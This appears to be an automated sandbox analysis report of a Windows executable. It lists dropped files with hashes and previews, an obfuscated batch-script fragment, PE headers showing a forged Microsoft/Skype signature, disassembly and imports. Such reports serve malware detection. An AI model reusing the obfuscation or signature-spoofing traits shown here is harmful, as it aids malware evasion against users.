                                                                                Preview:R.L.R.E.C.V.M.S.G.....G.U.I.C.T.R.L.R.E.G.I.S.T.E.R.L.I.S.T.V.I.E.W.S.O.R.T...G.U.I.C.T.R.L.S.E.N.D.M.S.G.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....G.U.I.C.T.R.L.S.E.T.B.K.C.O.L.O.R...G.U.I.C.T.R.L.S.E.T.C.O.L.O.R...G.U.I.C.T.R.L.S.E.T.C.U.R.S.O.R.....G.U.I.C.T.R.L.S.E.T.D.A.T.A.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....G.U.I.C.T.R.L.S.E.T.F.O.N.T.....G.U.I.C.T.R.L.S.E.T.G.R.A.P.H.I.C...G.U.I.C.T.R.L.S.E.T.I.M.A.G.E...G.U.I.C.T.R.L.S.E.T.L.I.M.I.T...G.U.I.C.T.R.L.S.E.T.O.N.E.V.E.N.T...G.U.I.C.T.R.L.S.E.T.P.O.S...G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....G.U.I.C.T.R.L.S.E.T.S.T.A.T.E...G.U.I.C.T.R.L.S.E.T.S.T.Y.L.E...G.U.I.C.T.R.L.S.E.T.T.I.P...G.U.I.D.E.L.E.T.E...G.U.I.G.E.T.C.U.R.S.O.R.I.N.F.O.....G.U.I.G.E.T.M.S.G...G.U.I.G.E.T.S.T.Y.L.E...G.U.I.R.E.G.I.S.T.E.R.M.S.G.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.S.E.T.B.K.C.O.L.O.R...G.U.I.S.E.T.C.O.O.R.D...G.U.I.S.E.T.C.U.R.S.O.R.....G.U.I.S.E.T.F.O.N.T.....G.U.I.S.E.T.H.E.L.P.....G.
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):114
                                                                                Entropy (8bit):3.5707554475367496
                                                                                Encrypted:false
                                                                                SSDEEP:3:gXK2CMRoyD/WQMRiWUqt/vllpfrYZ0:g6cOmMReqjP
                                                                                MD5:0155FAC83FBFAC34AAF9BFCC3CB3A75E
                                                                                SHA1:3D78DB6742774D1BA3EF4E16D875263A0A57443D
                                                                                SHA-256:015A5397FBE4822CD1F4ED2F49BD7065A384949342FC3B33A57F3DFDB7EE9818
                                                                                SHA-512:64FD598B7C5D14AE0D8F3421862CC87CFDE6B1255F34345B745420EECE0830A8693AC891F094986D440371E02FD3BBCE71E042BBCC1FE9B8A746723607C400C8
                                                                                Malicious:false
                                                                                Preview:ReprintVerificationMercyRepository..MZ......................@...............................................!..L.!
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):30720
                                                                                Entropy (8bit):6.608167810589763
                                                                                Encrypted:false
                                                                                SSDEEP:768:Msc7nj6evkuKa5GCJ5YxtXazSTvHZ9ijrUTS7:MHHvpKa5Gk6/vij4S
                                                                                MD5:C62C379E829A5BE535E99B5FD0FD7B06
                                                                                SHA1:08A46D476BDF73B1B4C590B573BD86DF974A6954
                                                                                SHA-256:2CD989421CA19C294FB517AD67AF162261C8B7266E17F213BA5D7F0EBDFB9FA7
                                                                                SHA-512:747EB35C68EA6B7DF06C50C11578FC79D183659592DE23E88427743AC887E4C71F4E2156F6AEB8B03D957336E28BD591627B26ACC454510C1BA325C0696E73E0
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):75776
                                                                                Entropy (8bit):7.997426404870456
                                                                                Encrypted:true
                                                                                SSDEEP:1536:pwHfz6DaJt+kX2UsIP+dzAOcsx8dI3nat3Bt7L8A8Smd/kw819:poz6DykUmg++Ocs/qPt3Ev819
                                                                                MD5:3518AAAF5366B46B638C08F39548AAF9
                                                                                SHA1:8B9D27A900934012735399DC261DDE510C79992B
                                                                                SHA-256:4886AF9DC9FBD57CE7C8FD486247790BFACD468184CF1EC8F66931D262E06729
                                                                                SHA-512:3919CE7F63753778BEF4DD2D247D656566DA553203DF063F1BBA9F7E9F7134ECD4C7C5BFD21B66CDA76B5031679CAB536B818EF6EC2A29E64C9E2C6B287CDEBD
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:ASCII text, with very long lines (1538), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):22996
                                                                                Entropy (8bit):5.020348530355967
                                                                                Encrypted:false
                                                                                SSDEEP:384:fRXCocw4Tvb7yU9ufdQgsIvlIw00bzj+ieJ5hAAI9xm3CDa+DrrydDroY5XHYXvp:DSjnaewJ+iX9xCCn/ryd/v4XhL
                                                                                MD5:4B3A0E1F46E0A61C8BFE9B6619A0D12B
                                                                                SHA1:5014B84611B06C05F3CEFD3F3E74713301A50FFE
                                                                                SHA-256:ECC8ABC33ADDDBA1A6FE1DC626698ABA572B61FE8A6988CE541DDB7B16F2E7C7
                                                                                SHA-512:540A8C2B3561087AFDDB79CC4827C0232B8BFC4486DBD535708D76AD6804E2B8526CB28168D717749E1983329AD20567DA19AD1283570CDD1E85D676368651C6
                                                                                Malicious:false
                                                                                Preview:Set Summaries=5..xuEssentially Merger Methods Polo ..BtLSRays ..GWDeviation ..CAUSkating Choice Utilization Differential Ft ..FcHints Estate Embedded Working Cleveland Humanities Mike Shanghai ..Set Rolling=U..IkkThrowing Excellent Routers Porter Obligations ..DTkKid Guys Offense Hiring Modes Cool Jewel Erp Acer ..cQHNot Preferred Rw Samba Challenging Equation Sea ..WbaMeals ..PfSvBend ..wXxlBrazil Foot ..FrPoems ..Set Adapters=K..OOLVTherefore ..orBMerger Lawrence Pulled Ribbon West Recognized ..tDMMug Wound Consisting Hundreds ..dxhManaged States Tank Logan ..KoSan Merger Searches Exercise Playlist Launch Measurements Strategy Leaving ..Set Springfield=i..uWmGenes Congress ..LJAiSenators Challenge Broadband Pure Operational Complete Port ..DDAdvanced Vat Availability ..mHETEmploy Toilet Differences Oasis Fish ..iUYbDiscussions Healthy Algebra ..Set Loaded=f..RkdSoil Semester ..GmjDryer Develop Authorities ..HITextbook Textbooks Laugh Foul Turned ..PfDiscounts ..FVGotten Blair Severe
                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                File Type:ASCII text, with very long lines (1538), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):22996
                                                                                Entropy (8bit):5.020348530355967
                                                                                Encrypted:false
                                                                                SSDEEP:384:fRXCocw4Tvb7yU9ufdQgsIvlIw00bzj+ieJ5hAAI9xm3CDa+DrrydDroY5XHYXvp:DSjnaewJ+iX9xCCn/ryd/v4XhL
                                                                                MD5:4B3A0E1F46E0A61C8BFE9B6619A0D12B
                                                                                SHA1:5014B84611B06C05F3CEFD3F3E74713301A50FFE
                                                                                SHA-256:ECC8ABC33ADDDBA1A6FE1DC626698ABA572B61FE8A6988CE541DDB7B16F2E7C7
                                                                                SHA-512:540A8C2B3561087AFDDB79CC4827C0232B8BFC4486DBD535708D76AD6804E2B8526CB28168D717749E1983329AD20567DA19AD1283570CDD1E85D676368651C6
                                                                                Malicious:false
                                                                                Preview:Set Summaries=5..xuEssentially Merger Methods Polo ..BtLSRays ..GWDeviation ..CAUSkating Choice Utilization Differential Ft ..FcHints Estate Embedded Working Cleveland Humanities Mike Shanghai ..Set Rolling=U..IkkThrowing Excellent Routers Porter Obligations ..DTkKid Guys Offense Hiring Modes Cool Jewel Erp Acer ..cQHNot Preferred Rw Samba Challenging Equation Sea ..WbaMeals ..PfSvBend ..wXxlBrazil Foot ..FrPoems ..Set Adapters=K..OOLVTherefore ..orBMerger Lawrence Pulled Ribbon West Recognized ..tDMMug Wound Consisting Hundreds ..dxhManaged States Tank Logan ..KoSan Merger Searches Exercise Playlist Launch Measurements Strategy Leaving ..Set Springfield=i..uWmGenes Congress ..LJAiSenators Challenge Broadband Pure Operational Complete Port ..DDAdvanced Vat Availability ..mHETEmploy Toilet Differences Oasis Fish ..iUYbDiscussions Healthy Algebra ..Set Loaded=f..RkdSoil Semester ..GmjDryer Develop Authorities ..HITextbook Textbooks Laugh Foul Turned ..PfDiscounts ..FVGotten Blair Severe
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):69632
                                                                                Entropy (8bit):6.4963210630411625
                                                                                Encrypted:false
                                                                                SSDEEP:1536:U6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGf:VCV26MqgQTc5F446iYNpA
                                                                                MD5:8641DD71E65547ED9A9C1AF825F9D9DB
                                                                                SHA1:0B326F2E487F75ABC13A45FDD09F13480C749C54
                                                                                SHA-256:D46CD3CE10C355622F4123A28F907292A65E0746AB8A6385C0EA212EE9EB2A0B
                                                                                SHA-512:496C1C1F689F2F89D636D07BC26FD442A9850043D02007F06D982A77E377AA6CB7CBE6E0C7CD97B2CBF99F515264F06EA387630A4675EAF092776E4ECD5387C0
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):46859
                                                                                Entropy (8bit):7.99648944840998
                                                                                Encrypted:true
                                                                                SSDEEP:768:+0nl55u+ywjONTBQNFKv2XQyW+2e7hMODDD7hfFVfU7ujG6+AVHHtO8FcvAcgmlh:+WlLjOsXKegFe7WOnvhvajSVHHPbcgmT
                                                                                MD5:6BFBE05FB38301713B9F66B5EE472D0B
                                                                                SHA1:752B64C7BB7B4D79D589C3F1D0D2640693E1DAA7
                                                                                SHA-256:BDC02640CB3D780B5EC58B66328D6591BF53F3786A5A9B14E56A132E4DD6DB6F
                                                                                SHA-512:30CDE90D57BC143B658FAC522A84A635A37DD6A2503666945C27BAD8DFB90488398B8B39D5C260DC0D8C8B9797AC7CF2D38420835BF6E22C5346BE9C594DD49C
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):34816
                                                                                Entropy (8bit):6.687027088281148
                                                                                Encrypted:false
                                                                                SSDEEP:768:I2tR/i01A/ES4KY2lfwMwstd7t+Jv/awuUw1Q37iehoxQeU3ecm:I2tR/i0027EM/awuUwU7KxQez
                                                                                MD5:B29471EA15F20AD6E7FA74902CA46141
                                                                                SHA1:68D24848AF29636CE283EEE0E702083850274F2C
                                                                                SHA-256:56143152CF4EF32820BBF2C358EBAF3FAAAFE857F802E04D11F7A6C34A9DF3D1
                                                                                SHA-512:A6002DF3D1C9C8512ED2115487A268E3F63127EFDF09E2F02538AA723B6B5E7E0BB6638C1519EEF6756BF8F0DAE6A45CC73A4AD1A2ED22C24DA3081BC8F6B758
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):57344
                                                                                Entropy (8bit):6.602211769609589
                                                                                Encrypted:false
                                                                                SSDEEP:1536:6PiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIx:6PNGR5yiPlcQ4Nvof
                                                                                MD5:3D15FB2B58D83B5627686D28477FF8EC
                                                                                SHA1:EF15E5C0A5D858E9EE8361F89B276EF71E1ABC5B
                                                                                SHA-256:60A85EA86F3BBB20466842F0937BCB4794799AFE9766CD46881C9CFE6AB0BBF5
                                                                                SHA-512:1D3DF4FD73727CEFECF9B22B59A2F7E9A17DD7478F583F4CF019280F6A9B4A4681136ABBF7B6F114A7C9ED38221294F9F13255B00ECECC91A3796D1F3060C249
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):50176
                                                                                Entropy (8bit):6.228928005255668
                                                                                Encrypted:false
                                                                                SSDEEP:768:GRGNul1Eovu86eV3QKYwlrRX9Qywqp9sK1xhNGE0psu0nM8+aZKA:YkU5uG3xYwBMK1zN90psu0nMOKA
                                                                                MD5:2FB44468B5D3C2A8E8362EA35A9EAD7F
                                                                                SHA1:33A34215295451FB8C603071F15C1FC38DEB7BF3
                                                                                SHA-256:1016415BD80A9943C3C103AA74BB3B6C3FEAE31437B97B52EEAE8B6A765280A5
                                                                                SHA-512:185E9DD02598F16E3E19E2802292EF6C23FED7E39AFA5626E854081434E4757AA47A9DC6FF9609D3ED470D5C38215EB8D2501ED54EA9166C90228AD13D5DF9FD
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):4.161383143104201
                                                                                Encrypted:false
                                                                                SSDEEP:384:+fU84444QnoooooooooooooooooooooooYooootooooooooooooooYoooooooooj:+SF
                                                                                MD5:8C7FF59E12229F9A378E1E87E0F9990A
                                                                                SHA1:E97332E12F5AE2238D329D9C1119856C7A90A741
                                                                                SHA-256:012804834CDA2559DBDFE72599126689D71901666EDE8E5D3830B0E3FF72EB47
                                                                                SHA-512:AB373CFA909A5984F901FFC6B45EED2243074FE053C580094750B4A689A84E5280393E757F362F346C5C3F0887C24300E9F5A9D08347CB0EAD60AB594A054E06
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):59392
                                                                                Entropy (8bit):6.485524505384207
                                                                                Encrypted:false
                                                                                SSDEEP:1536:4q5YdzhtD4RLGki26nWRgRPaM60w9/5Sh4ztrgWVl:4qi/x4Rqf21Rgat0g/bZF
                                                                                MD5:A9F1DF9C9ADF28A265BF5D63EE439A9A
                                                                                SHA1:BF6F9E32E63DEC76BDFBF087BF470C9C7E6E44D3
                                                                                SHA-256:D2AF659E6B06C7551951C547F9EE9F1DEF04EDB77FECF2429114A337DEA14168
                                                                                SHA-512:74FBA89644A30B31079DA38072BED641AA92E637BF07CD2FF38C473E0C37D86CF2927E33601B0BFBE8CB1D3F8A5F7EED4BF695A1911403CA78DCBE84F72214C4
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):202752
                                                                                Entropy (8bit):7.999153251598219
                                                                                Encrypted:true
                                                                                SSDEEP:3072:yZybHmdBTKNHPFi++zERSnlFtRZUDSP0ja7C/UUP02z6PMktPy036c38DWfOTb50:Ydh8PFQ4StqSfIUje6PxWchOhLRVA
                                                                                MD5:AF3FE75F183915ABD7585E5280C8C461
                                                                                SHA1:FAFD76965291C3C64BC6B7E93D4CF73F8FC6F490
                                                                                SHA-256:98773E10FF7BCF174B7C73F1BBD8E47F08E996BA201B2A30AC34897BCEF0F5FD
                                                                                SHA-512:A195027677B858BEBE350C675A7D91651FCDAC4319FDF690DE5AED00F137D06D15F3B3A7C6BDF162E996249FFF070583CE08E4275878CFCABEE69FC28A8904DE
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):24576
                                                                                Entropy (8bit):6.451890022070338
                                                                                Encrypted:false
                                                                                SSDEEP:384:JYaqkT/9VBOqoQYIJBCsZ45WOI3i9vKvgU3lvtz78fl/4XETSxh:J3T/QqoWBY5WK9ivg0XWYETGh
                                                                                MD5:EE1F3824CA43A53ADE6A62B2C4D891B1
                                                                                SHA1:E0A7D4742D4E2F003FD98937181E8F638E8CA4F2
                                                                                SHA-256:00401EACD2ABCD9D19C0A5196260F5AC627FEDB8375B932D94A35A26BEF34C1D
                                                                                SHA-512:F511A4DC203663993464C9C8E4424686A0446F2CC60598911F1A053D4725D763513B21CC6494458327A7119EB465163F4CDEA20038AA3765DD4543880FB949AB
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):6.183862240660329
                                                                                Encrypted:false
                                                                                SSDEEP:768:UGcjXB2SCursGHv7mlHW7nIhp/lNVi6dFiwcq:7ox2S3hPt8gNq
                                                                                MD5:79DFDEEA6C3EBE8AA05A3B5B361C79FB
                                                                                SHA1:5EEFAE1F383C753B0C18FF05CA3588FB9D6CC277
                                                                                SHA-256:56FF0739CEF74A4ABD0635950F07435B627E384495737F5B7285FB95F91E2DDC
                                                                                SHA-512:9CB0B22B332B03B0F2CE6E0F6671084EA39E64235313E8F8A00149D459F3CAA8B8BCA362708854C423E5FA6FFE762B19611EC05A9F57DEA62568E526534F7B68
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):46080
                                                                                Entropy (8bit):6.569106396798038
                                                                                Encrypted:false
                                                                                SSDEEP:768:brPhISqAbwGpKZrLlmPEp0wpk1dxvhc8cdPpLWtrJADK1c+d9Y9TnzA/o7uGwr9A:bgjGpS2EhkjxvhPc5pLW5N1c+d9YUA
                                                                                MD5:DB5E486C153F5227B3939C9C37189375
                                                                                SHA1:B1B6D1E88DD1D7622DE324EE9265D2AE743A6D92
                                                                                SHA-256:779F46FC17C935261963CD5B0686FEE09B75937894D0818C77B04F7570CABA63
                                                                                SHA-512:5C76650A10BBDF64E52762F1285915130832228192C9AAC2801CB8391B897306D7648FD58145D88DA2D3E465F4F5FCB17A1BC0FF87E6E0E338388C8FC68D9771
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:SysEx File - Soundcraft
                                                                                Category:dropped
                                                                                Size (bytes):7770
                                                                                Entropy (8bit):7.397161101158993
                                                                                Encrypted:false
                                                                                SSDEEP:192:DQ9xZSVZPNC3noFCe46qd8ZMPVc4VqzfkMQ3o:M9eVndCqT4EwMQ3o
                                                                                MD5:D616AA3C71C33E4AEAE6BE3776B9F1C8
                                                                                SHA1:6FB18D00DA2702637DB9644EB64D6023471C0EB8
                                                                                SHA-256:E99AEED2C33405A2128B1EEB3FCF77C05A45A840B7C2A1CAA5340B92E222B99B
                                                                                SHA-512:A495E112A3D52B3F5FF1199581D16F11A08383C340A79BE793F99DE9F6649D5CD164E4F49D675A2BBF178B477FA64CAFBDBD4770BF4836750C3E2C909F93BCCB
                                                                                Malicious:false
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.971861442689243
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:file.exe
                                                                                File size:834'674 bytes
                                                                                MD5:1b0fe9739ef19752cb12647b6a4ba97b
                                                                                SHA1:0672bbdf92feea7db8decb5934d921f8c47c3033
                                                                                SHA256:151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479
                                                                                SHA512:1c67f07c38c1a1d360675b8c3214ee7ee107bb4b48dbf8d3c2cd2c2cfbf9205847e77d73979a9ef907d1011ef525245ab295aae651c0f48b4368a73af873319b
                                                                                SSDEEP:12288:1CIFRWBr2HxOV32SGLvstHBe4BhbSJLhpnkfkywNgk30vDe31GnkNXT:1HFsUROVGS6stHBe4rQLofwgy0beTXT
                                                                                TLSH:B90523965EE44093E8762AF01572BA03AF3ABD3608B1814E9517ED2B35237E5D32C773
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                                Icon Hash:ccb2b95b692d8ecc
                                                                                Entrypoint:0x403883
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                Signature Valid:false
                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                Error Number:-2146869232
                                                                                Not Before, Not After
                                                                                • 24/04/2024 22:20:26 19/04/2025 22:20:26
                                                                                Subject Chain
                                                                                • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                Version:3
                                                                                Thumbprint MD5:EB1CAB20508C9A21DFB09B2075D0D0F8
                                                                                Thumbprint SHA-1:9AA38CA0F770AB0A44B553BCD390395BCEC61EB4
                                                                                Thumbprint SHA-256:4DCCE58A880975BFD0555B7BB6358D99792AD448E400A3F4E6704EF70D3EBE1B
                                                                                Serial:33000003DE6C778D9215F2E1960000000003DE
                                                                                Instruction
                                                                                sub esp, 000002D4h
                                                                                push ebx
                                                                                push ebp
                                                                                push esi
                                                                                push edi
                                                                                push 00000020h
                                                                                xor ebp, ebp
                                                                                pop esi
                                                                                mov dword ptr [esp+18h], ebp
                                                                                mov dword ptr [esp+10h], 00409268h
                                                                                mov dword ptr [esp+14h], ebp
                                                                                call dword ptr [00408030h]
                                                                                push 00008001h
                                                                                call dword ptr [004080B4h]
                                                                                push ebp
                                                                                call dword ptr [004082C0h]
                                                                                push 00000008h
                                                                                mov dword ptr [00472EB8h], eax
                                                                                call 00007FF0953C555Bh
                                                                                push ebp
                                                                                push 000002B4h
                                                                                mov dword ptr [00472DD0h], eax
                                                                                lea eax, dword ptr [esp+38h]
                                                                                push eax
                                                                                push ebp
                                                                                push 00409264h
                                                                                call dword ptr [00408184h]
                                                                                push 0040924Ch
                                                                                push 0046ADC0h
                                                                                call 00007FF0953C523Dh
                                                                                call dword ptr [004080B0h]
                                                                                push eax
                                                                                mov edi, 004C30A0h
                                                                                push edi
                                                                                call 00007FF0953C522Bh
                                                                                push ebp
                                                                                call dword ptr [00408134h]
                                                                                cmp word ptr [004C30A0h], 0022h
                                                                                mov dword ptr [00472DD8h], eax
                                                                                mov eax, edi
                                                                                jne 00007FF0953C2B2Ah
                                                                                push 00000022h
                                                                                pop esi
                                                                                mov eax, 004C30A2h
                                                                                push esi
                                                                                push eax
                                                                                call 00007FF0953C4F01h
                                                                                push eax
                                                                                call dword ptr [00408260h]
                                                                                mov esi, eax
                                                                                mov dword ptr [esp+1Ch], esi
                                                                                jmp 00007FF0953C2BB3h
                                                                                push 00000020h
                                                                                pop ebx
                                                                                cmp ax, bx
                                                                                jne 00007FF0953C2B2Ah
                                                                                add esi, 02h
                                                                                cmp word ptr [esi], bx
                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                • [RES] VS2010 SP1 build 40219
                                                                                • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x3e78 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc94d2 | 0x27a0 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x3e78 | 0x4000 | bc3bf0fbd79703fee0efce09913e88db | False | 0.84759521484375 | data | 7.371036255059769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf8000 | 0xf32 | 0x1000 | 34e72a365b7dd777b23f379d241b91f5 | False | 1.002685546875 | data | 7.909941577358274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf41c0 | 0x260a | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.001129595399466
RT_ICON | 0xf67d0 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6771402550091075
RT_DIALOG | 0xf78f8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xf79f8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xf7b18 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xf7b78 | 0x22 | data | English | United States | 0.9411764705882353
RT_MANIFEST | 0xf7ba0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
